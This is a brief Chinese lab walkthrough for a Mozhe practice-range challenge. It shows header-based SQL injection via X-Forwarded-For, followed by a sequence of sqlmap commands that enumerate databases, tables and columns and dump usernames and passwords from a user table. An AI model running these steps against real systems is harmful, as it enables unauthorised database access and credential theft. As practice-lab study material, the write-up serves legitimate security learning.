環境位置: https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe
參考: http://www.freesion.com/article/176849949/ 墨者里面的題 都有解
獲取登陸地址的請求信息
往請求頭信息加入X-Forwarded-For:*
一起寫入 保存到本地txt文件 123.txt
執行sqlmap
搜索看有沒有漏洞
sqlmap.py -r /Users/lucax/Desktop/123.txt
出現:(存在可以注入)
獲取當前用戶權限
sqlmap.py -r /Users/lucax/Desktop/123.txt --current-user
獲取當前數據庫庫名
sqlmap.py -r /Users/lucax/Desktop/123.txt --dbs
獲取數據庫表名
sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar --tables
獲取表里面的字段名
sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user --columns
獲取字段對應的值
sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user -C id,username,password --dump